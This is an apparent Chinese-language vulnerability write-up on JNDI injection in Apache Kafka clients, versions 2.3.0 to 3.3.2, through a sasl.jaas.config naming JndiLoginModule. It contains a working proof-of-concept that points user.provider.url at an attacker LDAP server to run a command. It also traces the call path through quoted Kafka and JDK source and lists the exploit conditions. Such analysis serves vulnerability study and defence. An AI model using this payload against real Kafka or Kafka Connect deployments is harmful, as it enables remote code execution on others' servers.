Kafka最初由LinkedIn公司开发,是一个分布式、支持分区(partition)、多副本(replica)、基于ZooKeeper协调的消息系统。它最大的特性是可以实时处理大量数据,以满足各种需求场景,比如基于Hadoop的批处理系统、低延迟的实时系统、Storm/Spark流式处理引擎、web/nginx日志、访问日志、消息服务等。Kafka用Scala语言编写,LinkedIn于2010年将其贡献给Apache基金会,之后成为顶级开源项目。
Kafka是由Apache软件基金会开发的一个开源流处理平台,由Scala和Java编写。该项目的目标是为处理实时数据提供一个统一、高吞吐、低延迟的平台。其持久化层本质上是一个“按照分布式事务日志架构的大规模发布/订阅消息队列”,这使它作为企业级基础设施来处理流式数据非常有价值。
此漏洞允许服务器连接到攻击者的 LDAP 服务器并反序列化 LDAP 响应,攻击者可以借此在 Kafka Connect 服务器上执行 Java 反序列化利用链(gadget chain)。当类路径中存在可用的 gadget 时,攻击者可以造成不可信数据的无限制反序列化,甚至远程代码执行(RCE)。
此漏洞利用的前提是:攻击者能够访问 Kafka Connect worker,并能够使用任意 Kafka 客户端 SASL JAAS 配置和基于 SASL 的安全协议在其上创建/修改连接器。自 Apache Kafka 2.3.0 起,Kafka Connect 集群支持这种配置方式。通过 Kafka Connect REST API 配置连接器时,经过身份验证的操作员可以将连接器任意 Kafka 客户端的 sasl.jaas.config 属性设置为“com.sun.security.auth.module.JndiLoginModule”,这可以通过“producer.override.sasl.jaas.config”、“consumer.override.sasl.jaas.config”或“admin.override.sasl.jaas.config”属性完成。
影响版本:Apache Kafka 2.3.0 - 3.3.2
<!-- Maven dependency used for the reproduction; version 3.3.0 lies inside the affected range stated above (2.3.0 - 3.3.2). -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>kafka-clients</artifactId>
<version>3.3.0</version>
</dependency>
/**
 * Demo entry point from the write-up: builds a KafkaProducer whose
 * sasl.jaas.config names JndiLoginModule, so that merely constructing the
 * producer walks the call path traced in the rest of this document.
 * Intended for reproduction in an isolated lab environment only.
 */
public static void main(String[] args) {
// On newer JDKs (above 8u191) this property must be set before an LDAP-based
// JNDI lookup will load remote classes; older JDKs are unaffected by it.
// (The author notes that on newer JDKs it can instead be combined with
// high-version JNDI bypass techniques.)
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
Properties props = new Properties();
props.put("security.protocol","SASL_SSL");
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
"required user.provider.url=\"ldap://192.168.0.104:1389/Basic/Command/calc\" " +
"useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
"group.provider.url=\"xxx\";");
props.put("bootstrap.servers", "localhost:9092");
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// NOTE(review): the producer is never closed; tolerable only because this is a throwaway demo.
Producer<String, String> producer = new KafkaProducer<>(props);
}
调试跟进方法
org.apache.kafka.clients.producer.KafkaProducer构造方法
// 3. Third constructor reached: wraps the config map in a ProducerConfig and
//    delegates to the seven-argument constructor (constructor 4), passing null
//    for metadata/client/interceptors and Time.SYSTEM as the clock.
public KafkaProducer(Map<String, Object> configs, Serializer<K> keySerializer, Serializer<V> valueSerializer) {
this(new ProducerConfig(ProducerConfig.appendSerializerToConfig(configs, keySerializer, valueSerializer)), keySerializer, valueSerializer, (ProducerMetadata)null, (KafkaClient)null, (ProducerInterceptors)null, Time.SYSTEM);
}
// 1. First constructor called (the one the demo invokes): delegates to
//    constructor 2 with null key/value serializers.
public KafkaProducer(Properties properties) {
this((Properties)properties, (Serializer)null, (Serializer)null);
}
// 2. Second constructor reached: converts the Properties into a Map via
//    Utils.propsToMap and delegates to constructor 3.
public KafkaProducer(Properties properties, Serializer<K> keySerializer, Serializer<V> valueSerializer) {
this(Utils.propsToMap(properties), keySerializer, valueSerializer);
}
// 4. Final constructor reached (constructor 4). The excerpt is abridged: the
//    "......" line stands for code the write-up omitted.
KafkaProducer(ProducerConfig config, Serializer<K> keySerializer, Serializer<V> valueSerializer, ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors<K, V> interceptors, Time time) {
try {
// Everything below (up to newSender) is field assignment
this.producerConfig = config;
this.time = time;
String transactionalId = config.getString("transactional.id");
this.clientId = config.getString("client.id");
LogContext logContext;
if (transactionalId == null) {
logContext = new LogContext(String.format("[Producer clientId=%s] ", this.clientId));
} else {
logContext = new LogContext(String.format("[Producer clientId=%s, transactionalId=%s] ", this.clientId, transactionalId));
}
......
this.errors = this.metrics.sensor("errors");
// Calls newSender(), the next step of the traced path
this.sender = this.newSender(logContext, kafkaClient, this.metadata);
String ioThreadName = "kafka-producer-network-thread | " + this.clientId;
this.ioThread = new KafkaThread(ioThreadName, this.sender, true);
this.ioThread.start();
config.logUnused();
AppInfoParser.registerAppInfo("kafka.producer", this.clientId, this.metrics, time.milliseconds());
this.log.debug("Kafka producer started");
} catch (Throwable var24) {
// Any failure during construction closes the producer and is rethrown wrapped in a KafkaException
this.close(Duration.ofMillis(0L), true);
throw new KafkaException("Failed to construct kafka producer", var24);
}
}
调用构造方法1
直至调用至构造方法4
org.apache.kafka.clients.producer.KafkaProducer#newSender()
// Builds the Sender used by the producer's I/O thread. On the traced path the
// relevant step is the creation of the ChannelBuilder from the producer config.
Sender newSender(LogContext logContext, KafkaClient kafkaClient, ProducerMetadata metadata) {
int maxInflightRequests = this.producerConfig.getInt("max.in.flight.requests.per.connection");
int requestTimeoutMs = this.producerConfig.getInt("request.timeout.ms");
// Continues into ClientUtils#createChannelBuilder()
ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(this.producerConfig, this.time, logContext);
ProducerMetrics metricsRegistry = new ProducerMetrics(this.metrics);
Sensor throttleTimeSensor = Sender.throttleTimeSensor(metricsRegistry.senderMetrics);
// A NetworkClient is only constructed when no KafkaClient was supplied by the caller
KafkaClient client = kafkaClient != null ? kafkaClient : new NetworkClient(new Selector(this.producerConfig.getLong("connections.max.idle.ms"), this.metrics, this.time, "producer", channelBuilder, logContext), metadata, this.clientId, maxInflightRequests, this.producerConfig.getLong("reconnect.backoff.ms"), this.producerConfig.getLong("reconnect.backoff.max.ms"), this.producerConfig.getInt("send.buffer.bytes"), this.producerConfig.getInt("receive.buffer.bytes"), requestTimeoutMs, this.producerConfig.getLong("socket.connection.setup.timeout.ms"), this.producerConfig.getLong("socket.connection.setup.timeout.max.ms"), this.time, true, this.apiVersions, throttleTimeSensor, logContext);
short acks = Short.parseShort(this.producerConfig.getString("acks"));
return new Sender(logContext, (KafkaClient)client, metadata, this.accumulator, maxInflightRequests == 1, this.producerConfig.getInt("max.request.size"), acks, this.producerConfig.getInt("retries"), metricsRegistry.senderMetrics, this.time, requestTimeoutMs, this.producerConfig.getLong("retry.backoff.ms"), this.transactionManager, this.apiVersions);
}
org.apache.kafka.clients.ClientUtils#createChannelBuilder()
public static ChannelBuilder createChannelBuilder(AbstractConfig config, Time time, LogContext logContext) {
//securityProtocol值为之前security.protocol设置值
SecurityProtocol securityProtocol = SecurityProtocol.forName(config.getString("security.protocol"));
String clientSaslMechanism = config.getString("sasl.mechanism");
//调用至ChannelBuilders#clientChannelBuilder()
return ChannelBuilders.clientChannelBuilder(securityProtocol, Type.CLIENT, config, (ListenerName)null, clientSaslMechanism, time, true, logContext);
}之前security.protocol
org.apache.kafka.common.network.ChannelBuilders#clientChannelBuilder()
// Validates the SASL-related arguments for client mode and delegates to
// ChannelBuilders#create() with Mode.CLIENT.
public static ChannelBuilder clientChannelBuilder(SecurityProtocol securityProtocol, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, String clientSaslMechanism, Time time, boolean saslHandshakeRequestEnable, LogContext logContext) {
if (securityProtocol == SecurityProtocol.SASL_PLAINTEXT || securityProtocol == SecurityProtocol.SASL_SSL) {
// contextType is non-null on the traced path (the caller passes Type.CLIENT), so this branch is not taken
if (contextType == null) {
throw new IllegalArgumentException("`contextType` must be non-null if `securityProtocol` is `" + securityProtocol + "`");
}
// clientSaslMechanism is non-null in the traced run (per the walkthrough), so this branch is not taken
if (clientSaslMechanism == null) {
throw new IllegalArgumentException("`clientSaslMechanism` must be non-null in client mode if `securityProtocol` is `" + securityProtocol + "`");
}
}
// Continues into ChannelBuilders#create()
return create(securityProtocol, Mode.CLIENT, contextType, config, listenerName, false, clientSaslMechanism, saslHandshakeRequestEnable, (CredentialCache)null, (DelegationTokenCache)null, time, logContext, (Supplier)null);
}
org.apache.kafka.common.network.ChannelBuilders#create()
// Selects a ChannelBuilder implementation from the security protocol,
// then calls configure(configs) on it and returns it.
private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) {
Map<String, Object> configs = channelBuilderConfigs(config, listenerName);
Object channelBuilder;
// securityProtocol corresponds to the configured security.protocol value
switch (securityProtocol) {
// Taken when security.protocol is SSL
case SSL:
requireNonNullMode(mode, securityProtocol);
channelBuilder = new SslChannelBuilder(mode, listenerName, isInterBrokerListener, logContext);
break;
// Taken when security.protocol is SASL_SSL or SASL_PLAINTEXT
case SASL_SSL:
case SASL_PLAINTEXT:
requireNonNullMode(mode, securityProtocol);
String sslClientAuthOverride = null;
Object jaasContexts;
// mode is Mode.CLIENT on the traced path (passed by clientChannelBuilder), so this branch is taken
if (mode != Mode.SERVER) {
JaasContext jaasContext = contextType == Type.CLIENT ? JaasContext.loadClientContext(configs) : JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs);
jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext);
// The else branch (server mode) is not taken on the traced path
} else {
List<String> enabledMechanisms = (List)configs.get("sasl.enabled.mechanisms");
jaasContexts = new HashMap(enabledMechanisms.size());
Iterator var18 = enabledMechanisms.iterator();
String listenerClientAuth;
while(var18.hasNext()) {
listenerClientAuth = (String)var18.next();
((Map)jaasContexts).put(listenerClientAuth, JaasContext.loadServerContext(listenerName, listenerClientAuth, configs));
}
if (listenerName != null && securityProtocol == SecurityProtocol.SASL_SSL) {
String configuredClientAuth = (String)configs.get("ssl.client.auth");
listenerClientAuth = (String)config.originalsWithPrefix(listenerName.configPrefix(), true).get("ssl.client.auth");
if (listenerClientAuth == null) {
sslClientAuthOverride = SslClientAuth.NONE.name().toLowerCase(Locale.ROOT);
if (configuredClientAuth != null && !configuredClientAuth.equalsIgnoreCase(SslClientAuth.NONE.name())) {
log.warn("Broker configuration '{}' is applied only to SSL listeners. Listener-prefixed configuration can be used to enable SSL client authentication for SASL_SSL listeners. In future releases, broker-wide option without listener prefix may be applied to SASL_SSL listeners as well. All configuration options intended for specific listeners should be listener-prefixed.", "ssl.client.auth");
}
}
}
}
// channelBuilder becomes a SaslChannelBuilder
channelBuilder = new SaslChannelBuilder(mode, (Map)jaasContexts, securityProtocol, listenerName, isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
break;
// Taken when security.protocol is PLAINTEXT
case PLAINTEXT:
channelBuilder = new PlaintextChannelBuilder(listenerName);
break;
// Taken for any other security.protocol value
default:
throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
}
// Calls channelBuilder.configure(configs):
//   SSL                        -> SslChannelBuilder
//   SASL_SSL / SASL_PLAINTEXT  -> SaslChannelBuilder
//   PLAINTEXT                  -> PlaintextChannelBuilder
// For any other value the default branch above has already thrown
// IllegalArgumentException, so this line is never reached.
((ChannelBuilder)channelBuilder).configure(configs);
return (ChannelBuilder)channelBuilder;
}
org.apache.kafka.common.network.SaslChannelBuilder#configure()
// SaslChannelBuilder#configure (abridged: "......" stands for code the write-up
// omitted, including the declarations of var12 and defaultLoginClass).
// For each (mechanism, JaasContext) entry it acquires a LoginManager and
// records the manager and its Subject.
public void configure(Map<String, ?> configs) throws KafkaException {
try {
......
while(var12.hasNext()) {
Map.Entry<String, JaasContext> entry = (Map.Entry)var12.next();
String mechanism = (String)entry.getKey();
// Continues into LoginManager#acquireLoginManager()
LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
this.loginManagers.put(mechanism, loginManager);
Subject subject = loginManager.subject();
this.subjects.put(mechanism, subject);
if (this.mode == Mode.SERVER && mechanism.equals("GSSAPI")) {
this.maybeAddNativeGssapiCredentials(subject);
}
}
if (this.securityProtocol == SecurityProtocol.SASL_SSL) {
this.sslFactory = new SslFactory(this.mode, this.sslClientAuthOverride, this.isInterBrokerListener);
this.sslFactory.configure(configs);
}
} catch (Throwable var9) {
// Any failure closes the builder and is rethrown wrapped in a KafkaException
this.close();
throw new KafkaException(var9);
}
}
org.apache.kafka.common.security.authenticator.LoginManager#acquireLoginManager()
// Returns a LoginManager for the given JAAS context, creating and caching one
// if none exists yet for the computed LoginMetadata. The lookup-or-create
// section runs while holding the LoginManager.class monitor.
public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
Class<? extends Login> loginClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.class", defaultLoginClass);
Class<? extends AuthenticateCallbackHandler> defaultLoginCallbackHandlerClass = "OAUTHBEARER".equals(saslMechanism) ? OAuthBearerUnsecuredLoginCallbackHandler.class : AbstractLogin.DefaultLoginCallbackHandler.class;
Class<? extends AuthenticateCallbackHandler> loginCallbackClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.callback.handler.class", defaultLoginCallbackHandlerClass);
Class var7 = LoginManager.class;
synchronized(LoginManager.class) {
Password jaasConfigValue = jaasContext.dynamicJaasConfig();
LoginManager loginManager;
LoginMetadata loginMetadata;
// jaasConfigValue holds the supplied sasl.jaas.config value and is non-null in the traced run (per the walkthrough)
if (jaasConfigValue != null) {
loginMetadata = new LoginMetadata(jaasConfigValue, loginClass, loginCallbackClass);
loginManager = (LoginManager)DYNAMIC_INSTANCES.get(loginMetadata);
// No cached LoginManager exists yet on first use (per the walkthrough)
if (loginManager == null) {
// Constructs a new LoginManager; its constructor performs the login
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
DYNAMIC_INSTANCES.put(loginMetadata, loginManager);
}
} else {
loginMetadata = new LoginMetadata(jaasContext.name(), loginClass, loginCallbackClass);
loginManager = (LoginManager)STATIC_INSTANCES.get(loginMetadata);
if (loginManager == null) {
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
STATIC_INSTANCES.put(loginMetadata, loginManager);
}
}
SecurityUtils.addConfiguredSecurityProviders(configs);
return loginManager.acquire();
}
}
org.apache.kafka.common.security.authenticator.LoginManager构造方法
// Instantiates the configured Login and callback-handler classes, configures
// both, and immediately performs the login.
private LoginManager(JaasContext jaasContext, String saslMechanism, Map<String, ?> configs, LoginMetadata<?> loginMetadata) throws LoginException {
this.loginMetadata = loginMetadata;
this.login = (Login)Utils.newInstance(loginMetadata.loginClass);
this.loginCallbackHandler = (AuthenticateCallbackHandler)Utils.newInstance(loginMetadata.loginCallbackClass);
this.loginCallbackHandler.configure(configs, saslMechanism, jaasContext.configurationEntries());
this.login.configure(configs, jaasContext.name(), jaasContext.configuration(), this.loginCallbackHandler);
// Continues into login()
this.login.login();
}
org.apache.kafka.common.security.kerberos.KerberosLogin#login()
// KerberosLogin#login (excerpt truncated by the write-up: the "..." lines stand
// for omitted code and the closing brace of the method is not shown).
public LoginContext login() throws LoginException {
this.lastLogin = this.currentElapsedTime();
// Delegates to the parent class, AbstractLogin#login()
this.loginContext = super.login();
this.subject = this.loginContext.getSubject();
this.isKrbTicket = !this.subject.getPrivateCredentials(KerberosTicket.class).isEmpty();
AppConfigurationEntry[] entries = this.configuration().getAppConfigurationEntry(this.contextName());
if (entries.length == 0) {
this.isUsingTicketCache = false;
this.principal = null;
} else {
...
}
...
org.apache.kafka.common.security.authenticator.AbstractLogin#login()
// Creates a JAAS LoginContext from this login's context name, callback handler
// and configuration, performs the login, and returns the context.
public LoginContext login() throws LoginException {
// Create the LoginContext (no pre-existing Subject is supplied)
this.loginContext = new LoginContext(this.contextName, (Subject)null, this.loginCallbackHandler, this.configuration);
// Continues into LoginContext#login()
this.loginContext.login();
log.info("Successfully logged in.");
return this.loginContext;
}
javax.security.auth.login.LoginContext#login()
// JDK LoginContext#login: runs the login phase and then the commit phase of the
// configured modules; on LoginException it runs the abort phase and rethrows
// the original exception.
public void login() throws LoginException {
loginSucceeded = false;
if (subject == null) {
subject = new Subject();
}
try {
// module invoked in doPrivileged
// LOGIN_METHOD is "login" (per the walkthrough; the constant is declared outside this excerpt)
invokePriv(LOGIN_METHOD);
invokePriv(COMMIT_METHOD);
loginSucceeded = true;
} catch (LoginException le) {
try {
invokePriv(ABORT_METHOD);
} catch (LoginException le2) {
// A failure during abort is discarded in favour of the original login failure
throw le;
}
throw le;
}
}
javax.security.auth.login.LoginContext#invokePriv()
// Runs invoke(methodName) inside AccessController.doPrivileged using
// creatorAcc, and unwraps a PrivilegedActionException back into the
// LoginException it carries.
private void invokePriv(final String methodName) throws LoginException {
try {
java.security.AccessController.doPrivileged
(new java.security.PrivilegedExceptionAction<Void>() {
public Void run() throws LoginException {
// Continues into LoginContext#invoke()
invoke(methodName);
return null;
}
}, creatorAcc);
} catch (java.security.PrivilegedActionException pae) {
throw (LoginException)pae.getException();
}
}
javax.security.auth.login.LoginContext#invoke()
// JDK LoginContext#invoke: for each entry of moduleStack, lazily instantiates
// the LoginModule class named in the entry (via Class.forName and its
// constructor), reflectively calls its initialize method, and then reflectively
// calls the method named by methodName. On the traced path the class name comes
// from the sasl.jaas.config entry, which is how JndiLoginModule#login() is reached.
private void invoke(String methodName) throws LoginException {
// start at moduleIndex
// - this can only be non-zero if methodName is LOGIN_METHOD
for (int i = moduleIndex; i < moduleStack.length; i++, moduleIndex++) {
try {
int mIndex = 0;
Method[] methods = null;
if (moduleStack[i].module != null) {
methods = moduleStack[i].module.getClass().getMethods();
} else {
// instantiate the LoginModule
//
// Allow any object to be a LoginModule as long as it
// conforms to the interface.
Class<?> c = Class.forName(
moduleStack[i].entry.getLoginModuleName(),
true,
contextClassLoader);
Constructor<?> constructor = c.getConstructor(PARAMS);
Object[] args = { };
moduleStack[i].module = constructor.newInstance(args);
// call the LoginModule's initialize method
methods = moduleStack[i].module.getClass().getMethods();
for (mIndex = 0; mIndex < methods.length; mIndex++) {
if (methods[mIndex].getName().equals(INIT_METHOD)) {
break;
}
}
Object[] initArgs = {subject,
callbackHandler,
state,
moduleStack[i].entry.getOptions() };
// invoke the LoginModule initialize method
//
// Throws ArrayIndexOutOfBoundsException if no such
// method defined. May improve to use LoginException in
// the future.
// Reflective call of the module's initialize method with the entry's options
methods[mIndex].invoke(moduleStack[i].module, initArgs);
}
// find the requested method in the LoginModule
for (mIndex = 0; mIndex < methods.length; mIndex++) {
if (methods[mIndex].getName().equals(methodName)) {
break;
}
}
// set up the arguments to be passed to the LoginModule method
Object[] args = { };
// invoke the LoginModule method
//
// Throws ArrayIndexOutOfBoundsException if no such
// method defined. May improve to use LoginException in
// the future.
boolean status = ((Boolean)methods[mIndex].invoke
(moduleStack[i].module, args)).booleanValue();
if (status == true) {
// if SUFFICIENT, return if no prior REQUIRED errors
if (!methodName.equals(ABORT_METHOD) &&
!methodName.equals(LOGOUT_METHOD) &&
moduleStack[i].entry.getControlFlag() ==
AppConfigurationEntry.LoginModuleControlFlag.SUFFICIENT &&
firstRequiredError == null) {
// clear state
clearState();
if (debug != null)
debug.println(methodName + " SUFFICIENT success");
return;
}
if (debug != null)
debug.println(methodName + " success");
success = true;
} else {
if (debug != null)
debug.println(methodName + " ignored");
}
} catch (NoSuchMethodException nsme) {
MessageFormat form = new MessageFormat(ResourcesMgr.getString
("unable.to.instantiate.LoginModule.module.because.it.does.not.provide.a.no.argument.constructor"));
Object[] source = {moduleStack[i].entry.getLoginModuleName()};
throwException(null, new LoginException(form.format(source)));
} catch (InstantiationException ie) {
throwException(null, new LoginException(ResourcesMgr.getString
("unable.to.instantiate.LoginModule.") +
ie.getMessage()));
} catch (ClassNotFoundException cnfe) {
throwException(null, new LoginException(ResourcesMgr.getString
("unable.to.find.LoginModule.class.") +
cnfe.getMessage()));
} catch (IllegalAccessException iae) {
throwException(null, new LoginException(ResourcesMgr.getString
("unable.to.access.LoginModule.") +
iae.getMessage()));
} catch (InvocationTargetException ite) {
// failure cases
LoginException le;
if (ite.getCause() instanceof PendingException &&
methodName.equals(LOGIN_METHOD)) {
// XXX
//
// if a module's LOGIN_METHOD threw a PendingException
// then immediately throw it.
//
// when LoginContext is called again,
// the module that threw the exception is invoked first
// (the module list is not invoked from the start).
// previously thrown exception state is still present.
//
// it is assumed that the module which threw
// the exception can have its
// LOGIN_METHOD invoked twice in a row
// without any commit/abort in between.
//
// in all cases when LoginContext returns
// (either via natural return or by throwing an exception)
// we need to call clearState before returning.
// the only time that is not true is in this case -
// do not call throwException here.
throw (PendingException)ite.getCause();
} else if (ite.getCause() instanceof LoginException) {
le = (LoginException)ite.getCause();
} else if (ite.getCause() instanceof SecurityException) {
// do not want privacy leak
// (e.g., sensitive file path in exception msg)
le = new LoginException("Security Exception");
le.initCause(new SecurityException());
if (debug != null) {
debug.println
("original security exception with detail msg " +
"replaced by new exception with empty detail msg");
debug.println("original security exception: " +
ite.getCause().toString());
}
} else {
// capture an unexpected LoginModule exception
java.io.StringWriter sw = new java.io.StringWriter();
ite.getCause().printStackTrace
(new java.io.PrintWriter(sw));
sw.flush();
le = new LoginException(sw.toString());
}
if (moduleStack[i].entry.getControlFlag() ==
AppConfigurationEntry.LoginModuleControlFlag.REQUISITE) {
if (debug != null)
debug.println(methodName + " REQUISITE failure");
// if REQUISITE, then immediately throw an exception
if (methodName.equals(ABORT_METHOD) ||
methodName.equals(LOGOUT_METHOD)) {
if (firstRequiredError == null)
firstRequiredError = le;
} else {
throwException(firstRequiredError, le);
}
} else if (moduleStack[i].entry.getControlFlag() ==
AppConfigurationEntry.LoginModuleControlFlag.REQUIRED) {
if (debug != null)
debug.println(methodName + " REQUIRED failure");
// mark down that a REQUIRED module failed
if (firstRequiredError == null)
firstRequiredError = le;
} else {
if (debug != null)
debug.println(methodName + " OPTIONAL failure");
// mark down that an OPTIONAL module failed
if (firstError == null)
firstError = le;
}
}
}
// we went thru all the LoginModules.
if (firstRequiredError != null) {
// a REQUIRED module failed -- return the error
throwException(firstRequiredError, null);
} else if (success == false && firstError != null) {
// no module succeeded -- return the first error
throwException(firstError, null);
} else if (success == false) {
// no module succeeded -- all modules were IGNORED
throwException(new LoginException
(ResourcesMgr.getString("Login.Failure.all.modules.ignored")),
null);
} else {
// success
clearState();
return;
}
}
com.sun.security.auth.module.JndiLoginModule#login()
/**
 * JndiLoginModule#login as quoted by the write-up.
 *
 * Requires both the user and group provider URLs to be set, then attempts
 * authentication: first from shared state when tryFirstPass or useFirstPass
 * is enabled, otherwise (or after a failed tryFirstPass) by prompting.
 *
 * @return true when authentication succeeds
 * @throws LoginException if a provider is missing or authentication fails
 */
public boolean login() throws LoginException {
// userProvider must not be null
if (userProvider == null) {
throw new LoginException
("Error: Unable to locate JNDI user provider");
}
// groupProvider must not be null
if (groupProvider == null) {
throw new LoginException
("Error: Unable to locate JNDI group provider");
}
if (debug) {
System.out.println("\t\t[JndiLoginModule] user provider: " +
userProvider);
System.out.println("\t\t[JndiLoginModule] group provider: " +
groupProvider);
}
// attempt the authentication
// Taken when tryFirstPass is true
if (tryFirstPass) {
try {
// attempt the authentication by getting the
// username and password from shared state
// attemptAuthentication performs the JNDI lookup on userProvider
// (the injection point identified by the walkthrough)
attemptAuthentication(true);
// authentication succeeded
succeeded = true;
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"tryFirstPass succeeded");
}
return true;
} catch (LoginException le) {
// authentication failed -- try again below by prompting
cleanState();
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"tryFirstPass failed with:" +
le.toString());
}
}
// Taken when useFirstPass is true
} else if (useFirstPass) {
try {
// attempt the authentication by getting the
// username and password from shared state
// attemptAuthentication performs the JNDI lookup on userProvider
// (the injection point identified by the walkthrough)
attemptAuthentication(true);
// authentication succeeded
succeeded = true;
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"useFirstPass succeeded");
}
return true;
} catch (LoginException le) {
// authentication failed
cleanState();
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"useFirstPass failed");
}
throw le;
}
}
// attempt the authentication by prompting for the username and pwd
try {
attemptAuthentication(false);
// authentication succeeded
succeeded = true;
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"regular authentication succeeded");
}
return true;
} catch (LoginException le) {
cleanState();
if (debug) {
System.out.println("\t\t[JndiLoginModule] " +
"regular authentication failed");
}
throw le;
}
}
com.sun.security.auth.module.JndiLoginModule#attemptAuthentication()
// JndiLoginModule#attemptAuthentication (excerpt truncated by the write-up:
// "...." stands for omitted code and the rest of the method is not shown).
// Obtains the username/password, then looks up userProvider through JNDI and
// searches it for the user's entry.
private void attemptAuthentication(boolean getPasswdFromSharedState)
throws LoginException {
String encryptedPassword = null;
// first get the username and password
// Per the walkthrough: with getPasswdFromSharedState == true execution continues
// to the lookup below; with false the author observed a failure path that never
// reaches the JNDI lookup. NOTE(review): getUsernamePassword is not shown here - confirm.
getUsernamePassword(getPasswdFromSharedState);
try {
// get the user's passwd entry from the user provider URL
InitialContext iCtx = new InitialContext();
// JNDI lookup of the configured user.provider.url (the injection point)
ctx = (DirContext)iCtx.lookup(userProvider);
SearchControls controls = new SearchControls();
NamingEnumeration<SearchResult> ne = ctx.search("",
"(uid=" + username + ")",
controls);
if (ne.hasMore()) {
SearchResult result = ne.next();
Attributes attributes = result.getAttributes();
....
}
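调用链如下:
KafkaProducer构造方法 → KafkaProducer#newSender() → ClientUtils#createChannelBuilder() → ChannelBuilders#clientChannelBuilder() → ChannelBuilders#create() → SaslChannelBuilder#configure() → LoginManager#acquireLoginManager() → LoginManager构造方法 → KerberosLogin#login() → AbstractLogin#login() → LoginContext#login() → LoginContext#invokePriv() → LoginContext#invoke() → JndiLoginModule#login() → JndiLoginModule#attemptAuthentication() → InitialContext#lookup()
综上,若要进行JNDI注入,需满足以下条件: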
// Summary of the conditions the walkthrough identifies for reaching the JNDI lookup.
// security.protocol must be SASL_SSL or SASL_PLAINTEXT
props.put("security.protocol","SASL_SSL");
// bootstrap.servers must be non-empty; an empty value fails configuration parsing
props.put("bootstrap.servers", "localhost:9092");
// key.serializer must be set and resolvable
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// value.serializer must be set and resolvable
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// sasl.jaas.config names com.sun.security.auth.module.JndiLoginModule, whose login() is ultimately invoked reflectively
// useFirstPass or tryFirstPass must be "true"
// serviceName must be non-empty
// group.provider.url must be non-empty
// user.provider.url (on the "required" entry) is the address handed to the JNDI lookup
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
"required user.provider.url=\"ldap://192.168.0.104:1389/Basic/Command/calc\" " +
"useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
"group.provider.url=\"xxx\";");